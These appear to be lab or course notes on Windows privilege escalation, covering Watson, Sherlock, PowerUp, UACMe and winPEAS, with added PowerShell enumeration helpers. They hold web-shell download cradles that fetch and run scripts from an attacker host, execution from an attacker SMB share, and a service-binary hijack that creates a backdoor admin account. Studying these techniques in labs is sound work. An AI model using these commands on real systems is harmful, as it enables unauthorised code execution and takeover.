Watson
Check the target's .NET version and build Watson against that same framework version in Visual Studio (a mismatched target framework is the usual reason Watson.exe refuses to run):
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build > Your version: OSx86 ..match the target framework and platform (x86/x64) of the victim
\\10.10.14.34\share\Watson.exe ..run it straight from an SMB share hosted on the attacker box
Watson Found 5 Vulns
Including: MS11-046
Sherlock
locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1 ..fixed some bad unicode at the beginning of the file (typically a UTF-8 byte-order mark, which breaks the stdin trick below)
vim Sherlock.ps1
Find-AllVulns ..add as last line, so the script runs its checks as soon as it is loaded
http://10.x.x.x/ippsec.php?fexec=
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -
..$MyIP is a placeholder for the attacker IP; cmd echoes the one-liner into powershell's stdin (the trailing '-'), and DownloadString keeps the script in memory so nothing touches disk
Found:
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and winning a race condition ..let's ignore
UACME
Tries 30+ ways to PrivEsc ..all of them UAC bypasses, so it only helps when you already run as a local admin with the filtered (medium-integrity) token
"You AC Me Bro"
UAC Bypass
User Account Control
Metasploit has 'bypassuac' (exploit/windows/local/bypassuac) for Windows 7
PowerShell Empire has UAC modules too, including one that simply prompts the user in a nice way
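Before reaching for UACMe or bypassuac it is worth checking whether a UAC bypass is even the right move. The check below is an added example, not code from the notes, UACMe, Metasploit or Empire; it assumes you already have a PowerShell prompt on the victim (Vista or later, English whoami output) and reads the UAC policy values plus the current token. A bypass only applies when the user is in BUILTIN\Administrators but is running with the filtered token UAC hands out.

```powershell
# Added example (not from the course notes): is a UAC bypass relevant here?
# A bypass only helps when the current user is in local Administrators but
# the process holds the filtered (medium-integrity) token. Runs on PS 2.0+.

function Get-UacContext {
    $policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue

    # Registry knobs that decide whether a bypass is needed at all.
    # Defaults assumed when a value is absent: EnableLUA=1, ConsentPromptBehaviorAdmin=5.
    $enableLua = 1
    if ($null -ne $policy.EnableLUA) { $enableLua = [int]$policy.EnableLUA }
    $consent = 5
    if ($null -ne $policy.ConsentPromptBehaviorAdmin) { $consent = [int]$policy.ConsentPromptBehaviorAdmin }

    # IsInRole(Administrator) is true only for the elevated (unfiltered) token.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # Is the user in BUILTIN\Administrators at all? In the filtered token the
    # SID S-1-5-32-544 is still listed by whoami /groups, marked
    # "Group used for deny only", so match on the SID rather than the attributes.
    $groups    = whoami /groups
    $inAdmins  = [bool]($groups | Select-String -SimpleMatch 'S-1-5-32-544')
    $integrity = ($groups | Select-String 'Mandatory Level' |
                  ForEach-Object { ($_.Line -split '\s{2,}')[0] }) -join ','

    if ($enableLua -eq 0) {
        $verdict = 'UAC disabled: admins get a full token, no bypass needed'
    } elseif ($elevated) {
        $verdict = 'already running elevated (high integrity)'
    } elseif ($inAdmins -and $consent -eq 0) {
        $verdict = 'admin with ConsentPromptBehaviorAdmin=0: elevation is silent, just Start-Process -Verb RunAs'
    } elseif ($inAdmins) {
        $verdict = 'filtered admin token: a UAC bypass (UACMe, bypassuac, Empire) applies'
    } else {
        $verdict = 'not a local admin: a UAC bypass will not help, you need a real privesc'
    }

    New-Object PSObject -Property @{
        User                       = $identity.Name
        Elevated                   = $elevated
        InAdministrators           = $inAdmins
        IntegrityLevel             = $integrity
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $consent
        Verdict                    = $verdict
    }
}

Get-UacContext | Format-List
```

If the verdict says you are not a local admin, skip the whole UAC section and go back to PowerUp / winPEAS style checks; UAC bypasses never cross the user-to-admin boundary.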
BeRoot
Checks for common privesc misconfigurations (Windows and Linux versions)
C:\Tools\beRoot.exe
Found lots of vulns for PrivEsc
PowerUp Scan
PowerShell script to find PrivEsc vulns and exploit them (ships with PowerSploit and Empire)
Empire path: PowerShell > PowerShellEmpire > PowerUp.ps1
locate PowerUp.ps1 (empire)
cp PowerUp.ps1 .
vim PowerUp.ps1 ..add 'Invoke-AllChecks' as the last line so the download cradle runs the scan
python -m SimpleHTTPServer ..serves the current directory on port 8000
Send to victim (ex: via the Drupal webshell)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -
Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an ..3306 (mysql) is listening, but not oracle (1521), so nothing privileged is running from that directory
PowerUp Abuse
Abuse functions ..
Write-UserAddMSI ..builds an MSI that adds a local admin (for AlwaysInstallElevated)
Write-ServiceBinary ..drops a service binary that creates user 'john' with password 'Password123!' and adds it to local Administrators
locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer ..share
Send the file to the victim ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -
PS> Import-Module .\PowerUp.ps1 ..from the low-priv shell you are trying to escalate
PS> Invoke-AllChecks ..scan
----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe
Exploit:
Creates a new user 'john' with password 'Password123!' and local admin
(the dropped binary only runs after a reboot / service restart, and it only gets you admin if the service runs as SYSTEM; you also need write access to C:\Program Files\VideoStream\ for the hijack file to land)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath "C:\Program Files\VideoStream\1337.exe"
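To see why that path is exploitable, and which file Write-ServiceBinary has to drop, here is the unquoted-path logic worked out by hand. This is an added example, not code from the notes and not PowerUp's own implementation; the VideoStream path is the constructed example from the notes, and Find-UnquotedServicePath does a real write probe in each candidate directory on the host it runs on.

```powershell
# Added example, not from the notes and not PowerUp's own code: reproduces the
# logic behind Invoke-AllChecks' unquoted-service-path finding so you can see
# which hijack file Write-ServiceBinary has to drop and whether you can drop it.

# The service control manager tries every prefix ending at a space as
# "<prefix>.exe" before the real binary; return those candidates in the order
# Windows tries them. Quoted paths and paths without spaces are not exploitable.
function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory=$true)][string]$PathName)

    $path = $PathName.Trim()
    if ($path.StartsWith('"') -or $path -notmatch ' ') { return @() }

    # Drop any arguments: keep everything up to and including the first ".exe".
    $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { $path = $m.Groups[1].Value }

    $candidates = @()
    $parts = $path -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

# Real write attempt in the candidate's directory (random file name, removed
# again). More reliable than interpreting the DACL by hand, and it is exactly
# what decides whether Write-ServiceBinary can plant the file.
function Test-WritableDirectory {
    param([Parameter(Mandatory=$true)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        $fs = [IO.File]::Create($probe)
        $fs.Close()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# One row per (service, hijack candidate). Only rows with Writable = True and
# StartName = LocalSystem are worth a Write-ServiceBinary, and the dropped
# binary still only runs on a service restart or reboot.
function Find-UnquotedServicePath {
    # Get-WmiObject rather than Get-CimInstance so this also runs on PS 2.0 hosts.
    $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName }
    foreach ($svc in $services) {
        foreach ($candidate in (Get-UnquotedPathCandidates -PathName $svc.PathName)) {
            New-Object PSObject -Property @{
                ServiceName = $svc.Name
                StartName   = $svc.StartName
                StartMode   = $svc.StartMode
                PathName    = $svc.PathName
                HijackPath  = $candidate
                Writable    = Test-WritableDirectory -Directory (Split-Path -Parent $candidate)
            }
        }
    }
}

# Constructed input taken from the notes: lists the paths Windows tries before the real binary.
Get-UnquotedPathCandidates -PathName 'C:\Program Files\VideoStream\1337 Log\Checklog.exe'

# Live enumeration on the victim:
Find-UnquotedServicePath | Where-Object { $_.Writable } | Format-Table ServiceName, StartName, HijackPath -AutoSize
```

For the notes' path the first candidate is C:\Program.exe, which a normal user cannot create (file creation in the drive root is admin-only), so the realistic target is C:\Program Files\VideoStream\1337.exe and the question is whether that directory is writable; the Writable column answers it.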
SharpUp
C# port of PowerUp's checks; run it from PowerShell or cmd on the victim:
> SharpUp.exe
Seatbelt
Host enumeration (C#); collects lots of situational-awareness data but doesn't hunt for privesc paths by itself
Seatbelt.exe ..run without arguments for the list of commands / help
Seatbelt.exe all
Seatbelt.exe NonstandardServices
winPEAS
Hunts for privesc paths and highlights the interesting findings
Most powerful tool in this course!
Most maintained tool
Enums failing?
Couldn't get Watson or winPEAS.exe to work
.NET might be OLD ..both are .NET assemblies and need a runtime on the target that can load what they were built against
Example: 'Granny' had v1.0 .NET
> dir C:\Windows\Microsoft.NET\Framework ..one folder per installed runtime (v1.0.3705, v2.0.50727, v4.0.30319 ...)
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"
Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437
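The reg query and dir commands above (and the same check at the top of the Watson section) give raw keys and folder names; the function below turns them into a list of installed framework versions and CLR runtimes so you know which target framework to pick in Visual Studio. It is an added example, not part of the notes or of Watson; the Release-to-version table for 4.5+ is Microsoft's documented minimum Release values, and the defaults assumed when a key is missing are marked in the comments.

```powershell
# Added example (not part of the notes): enumerate every .NET Framework
# version installed on the victim so Watson / winPEAS.exe / SharpUp can be
# built against a framework that actually exists there. Runs on PS 2.0+.

function Get-DotNetVersions {
    $ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
    $frameworks = @()

    # 4.5 and later all live under v4\Full and differ only by the Release
    # DWORD; these are Microsoft's documented minimum Release values, highest first.
    $releaseMap = @(
        @(528040, '4.8'),   @(461808, '4.7.2'), @(461308, '4.7.1'), @(460798, '4.7'),
        @(394802, '4.6.2'), @(394254, '4.6.1'), @(393295, '4.6'),
        @(379893, '4.5.2'), @(378675, '4.5.1'), @(378389, '4.5')
    )

    # v1.1, v2.0, v3.0 and v3.5 each have their own key with Install=1.
    # (.NET 1.0 is not registered under NDP at all: see the folder listing below.)
    $keys = Get-ChildItem -Path $ndp -ErrorAction SilentlyContinue |
            Where-Object { $_.PSChildName -match '^v[123]\.' }
    foreach ($key in $keys) {
        $props = Get-ItemProperty -Path $key.PSPath
        if ($props.Install -ne 1) { continue }
        $version = $key.PSChildName.TrimStart('v')   # fallback when no Version value (v1.1)
        if ($props.Version) { $version = $props.Version }
        $frameworks += New-Object PSObject -Property @{ Key = $key.PSChildName; Version = $version; SP = $props.SP }
    }

    # v4: Install=1 under v4\Full; no Release value means plain 4.0 (assumed default).
    $v4 = Get-ItemProperty -Path "$ndp\v4\Full" -ErrorAction SilentlyContinue
    if ($v4 -and $v4.Install -eq 1) {
        $label = '4.0'
        foreach ($entry in $releaseMap) {
            if ($v4.Release -and [int]$v4.Release -ge $entry[0]) { $label = $entry[1]; break }
        }
        $frameworks += New-Object PSObject -Property @{ Key = 'v4\Full'; Version = $label; SP = $null }
    }

    # CLR runtimes actually present on disk: this is what decides whether a
    # given assembly loads (v1.0.3705, v1.1.4322, v2.0.50727, v4.0.30319).
    $clrs = @(Get-ChildItem -Path "$env:windir\Microsoft.NET\Framework" -ErrorAction SilentlyContinue |
              Where-Object { $_.PSIsContainer -and $_.Name -match '^v\d' } |
              ForEach-Object { $_.Name })

    New-Object PSObject -Property @{ Frameworks = $frameworks; CLRs = $clrs }
}

$net = Get-DotNetVersions
$net.Frameworks | Format-Table Key, Version, SP -AutoSize
'CLR runtimes on disk: ' + ($net.CLRs -join ', ')
```

A 2.0/3.5-only host (the Granny case) has no v4.0.30319 folder, so anything built for .NET 4.x will not start there regardless of how it was compiled; on 64-bit hosts the Framework64 folder holds the matching 64-bit runtimes.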
---------------------------------
Use the .bat instead!
C:\Temp>winPEAS.bat
Nothing happened?
Prefixing it with cmd /k worked.
If you check cmd /?, the /k switch "Carries out the command specified by string but remains".
I suspect cmd /c would work as well but never tried that.
C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...
More...
MS10-059 =
..for recent windows
USE:
SeImpersonatePrivilege
Allows impersonating another account's token Ex: \
SeAssignPrimaryTokenPrivilege
Similar. Enables the user to assign an access token to a new process.
Ex:
Example from
SharpUp - Good if you don't have PowerShell
C# compiled version:
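The two privileges above are worth checking explicitly, because a service-account shell (the kind a web shell hands you) often holds them even when nothing else looks promising. The following is an added example, not code from the notes, SharpUp or any tool: it parses whoami /priv (English output assumed) into objects and flags the interesting privileges. The first two entries in the table are the ones from the notes; the rest are added here as the usual suspects, and the sample output is constructed.

```powershell
# Added example, not part of the notes: list the privileges on the current
# token and flag the ones that are worth a token-abuse privesc.

# Privileges worth flagging and what each lets you do. SeImpersonate and
# SeAssignPrimaryToken are the ones from the notes; the rest are added here.
$InterestingPrivs = @{
    'SeImpersonatePrivilege'        = 'impersonate a client token, e.g. a SYSTEM token that connects to your pipe'
    'SeAssignPrimaryTokenPrivilege' = 'assign a (stolen) primary token to a new process'
    'SeBackupPrivilege'             = 'read any file regardless of its ACL (SAM and SYSTEM hives)'
    'SeRestorePrivilege'            = 'write any file regardless of its ACL'
    'SeDebugPrivilege'              = 'open any process, including SYSTEM ones'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any securable object'
    'SeLoadDriverPrivilege'         = 'load a kernel driver'
}

# Turn whoami /priv rows into objects. A row looks like:
# "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
# "Disabled" only means not currently enabled: a process can turn on any
# privilege that is present on its token, which is exactly what the tools do.
function ConvertFrom-WhoamiPriv {
    param([Parameter(Mandatory=$true)][string[]]$Lines)
    $out = @()
    foreach ($line in $Lines) {
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            $name = $matches[1]
            $out += New-Object PSObject -Property @{
                Privilege   = $name
                Description = $matches[2]
                Enabled     = ($matches[3] -eq 'Enabled')
                Interesting = $InterestingPrivs.ContainsKey($name)
                Why         = $InterestingPrivs[$name]
            }
        }
    }
    return $out
}

function Get-TokenPrivilege {
    ConvertFrom-WhoamiPriv -Lines (whoami /priv)
}

# Constructed sample: the typical token of an IIS / service account such as
# the one a web shell runs under.
$sample = @(
    'PRIVILEGES INFORMATION',
    '----------------------',
    '',
    'Privilege Name                Description                               State',
    '============================= ========================================= ========',
    'SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled',
    'SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled',
    'SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled',
    'SeImpersonatePrivilege        Impersonate a client after authentication Enabled',
    'SeCreateGlobalPrivilege       Create global objects                     Enabled'
)
ConvertFrom-WhoamiPriv -Lines $sample | Where-Object { $_.Interesting } |
    Format-Table Privilege, Enabled, Why -AutoSize

# On the victim:
Get-TokenPrivilege | Where-Object { $_.Interesting }
```

On the constructed sample both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are flagged even though the latter shows Disabled; presence on the token is what matters, not the current state.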